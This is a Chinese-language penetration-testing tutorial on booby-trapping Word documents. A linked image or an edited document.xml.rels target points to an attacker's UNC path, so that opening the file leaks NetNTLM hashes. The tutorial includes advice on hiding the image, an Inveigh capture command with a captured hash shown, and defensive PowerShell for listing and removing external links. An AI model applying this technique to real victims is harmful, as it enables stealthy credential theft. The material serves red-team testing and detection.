如何利用Microsoft Word中的圖像鏈接進(jìn)行UNC路徑注入滲透

如何利用Microsoft Word中的圖像鏈接進(jìn)行UNC路徑注入滲透，針對(duì)這個(gè)問(wèn)題，這篇文章詳細(xì)介紹了相對(duì)應(yīng)的分析和解答，希望可以幫助更多想解決這個(gè)問(wèn)題的小伙伴找到更簡(jiǎn)單易行的方法。

我們都知道Word文檔常會(huì)被一些黑客所利用，進(jìn)行各式各樣的入侵活動(dòng)。而在Web應(yīng)用滲透和紅隊(duì)比賽中，Word文檔也可被用于抓取NetNTLM哈?；蛴脕?lái)證明網(wǎng)絡(luò)出口過(guò)濾不嚴(yán)等問(wèn)題。在不久前，netbiosX曾在他的博客發(fā)布過(guò)一篇關(guān)于通過(guò)frameset抓取NetNTLM哈希的文章。本文的核心思路與該文是相同的，只是用了不同的一種方式：即通過(guò)一個(gè)鏈接插入圖片。

下面將會(huì)用到的工具：

Burp Suite Pro (collaborator客戶(hù)端)

Inveigh 

Responder (抓取hash)

7zip (提取文檔文件)

圖像鏈接

我們首先打開(kāi)菜單欄上的“插入”選項(xiàng)卡并單擊“圖片”圖標(biāo)。此時(shí)將會(huì)彈出資源管理器窗口。在文件名字段中輸入我們的惡意URL，并點(diǎn)擊“插入”下拉菜單選擇“鏈接到文件”。這樣我們就成功插入了一個(gè)burp collaborator的鏈接。

如果你的惡意文檔是用于紅隊(duì)或社會(huì)工程項(xiàng)目的，那么你還可以通過(guò)Layout選項(xiàng)來(lái)調(diào)整圖像大小，以提高其隱蔽性。

請(qǐng)確保已將更改保存到文檔中?，F(xiàn)在無(wú)論何時(shí)打開(kāi)此文檔，Microsoft Word都會(huì)嘗試解析文檔中的圖像鏈接。這些請(qǐng)求都將在Burp Collaborator客戶(hù)端中被記錄。

利用UNC路徑注入抓取NetNTLM哈希

同樣，這里我們用到的方法和netbiosX是一樣的，使用7zip提取Word文檔中包含的文件。我們要修改的文件是\your_word_doc.docx\word\_rels\下的document.xml.rels。該文件包含了一系列相互關(guān)聯(lián)的目標(biāo)，我們要做的就是將相關(guān)目標(biāo)值設(shè)置為偵聽(tīng)主機(jī)的UNC路徑。

保存該文件并使用7zip將其復(fù)制到word文檔中。

一旦用戶(hù)打開(kāi)Word文檔，Inveigh或Responder將會(huì)捕獲傳入的身份驗(yàn)證請(qǐng)求。

PS C:\> Invoke-Inveigh -NBNS N -LLMNR N -ConsoleOutput Y -IP 192.168.0.2 
Inveigh 1.3.1 started at 2017-12-19T17:22:26 
Elevated Privilege Mode = Enabled 
WARNING: Windows Firewall = Enabled 
Primary IP Address = 192.168.0.2 
LLMNR Spoofer = Disabled 
mDNS Spoofer = Disabled 
NBNS Spoofer = Disabled 
SMB Capture = Enabled 
WARNING: HTTP Capture Disabled Due To In Use Port 80 
HTTPS Capture = Disabled 
Machine Account Capture = Disabled 
Real Time Console Output = Enabled 
Real Time File Output = Disabled 
WARNING: Run Stop-Inveigh to stop Inveigh Press any key to stop real time console output
 
2017-12-19T17:23:19 SMB NTLMv2 challenge/response captured from 192.168.0.3(DESKTOP-2QRDJR2): 
Administrator::DESKTOP-2QRDJR2:57[TRUNCATED]cb:091[TRUNCATED]5BC:010[TRUNCATED]02E0032002E00310038003200000000000000000000000000

這種方法的一個(gè)主要有點(diǎn)是，其隱蔽性非常的高。一旦文檔被打開(kāi)就會(huì)發(fā)出請(qǐng)求，且不會(huì)向用戶(hù)顯示和提醒可能的惡意URL或UNC路徑。

使用PowerShell枚舉關(guān)聯(lián)目標(biāo)

上面用到的方法很簡(jiǎn)單，但卻非常的有效，這是因?yàn)槲覀兝昧薓icrosoft Office中的可信功能。接下來(lái)我將介紹兩種簡(jiǎn)單的枚舉關(guān)聯(lián)目標(biāo)的方法，這里將不會(huì)用到7zip。當(dāng)然也有很多優(yōu)秀的取證工具可以完成這些任務(wù)，如Yara。

Word.Application COM對(duì)象可被用于訪(fǎng)問(wèn)Word文檔的內(nèi)容。這可以通過(guò)幾個(gè)簡(jiǎn)單的命令來(lái)實(shí)現(xiàn)。WordOpenXML屬性包含文檔中的關(guān)聯(lián)。

$file = "C:\path\to\doc.docx"
$word = New-Object -ComObject Word.Application
$doc = $word.documents.open($file)
$xml = New-Object System.XML.XMLDocument
$xml = $doc.WordOpenXML
$targets = $xml.package.part.xmlData.Relationships.Relationship
$targets | Format-Table
$word.Quit()

這將成功枚舉文檔中的所有關(guān)聯(lián)的目標(biāo)。這里的問(wèn)題是，當(dāng)使用Word.Application COM對(duì)象時(shí)，將啟動(dòng)Word進(jìn)程并解析URL/UNC路徑。

為了避免這種情況，我們可以使用DocumentFormat.OpenXML庫(kù)并枚舉文檔中所有的外部關(guān)聯(lián)。在測(cè)試中使用該方法，并沒(méi)有捕獲collaborator請(qǐng)求或身份驗(yàn)證請(qǐng)求。

[System.Reflection.Assembly]::LoadFrom("C:\DocumentFormat.OpenXml.dll")
$file = "C:\path\to\doc.docx"
$doc = [DocumentFormat.OpenXml.Packaging.WordprocessingDocument]::Open($file,$true)
$targets = $doc.MainDocumentPart.ExternalRelationships
$targets
$doc.Close()

更進(jìn)一步，DeleteExternalRelationship方法將通過(guò)提供關(guān)聯(lián)id來(lái)移除與外部URL的關(guān)系。

$doc.MainDocumentPart.DeleteExternalRelationship("rId4")

關(guān)于如何利用Microsoft Word中的圖像鏈接進(jìn)行UNC路徑注入滲透問(wèn)題的解答就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，如果你還有很多疑惑沒(méi)有解開(kāi)，可以關(guān)注億速云行業(yè)資訊頻道了解更多相關(guān)知識(shí)。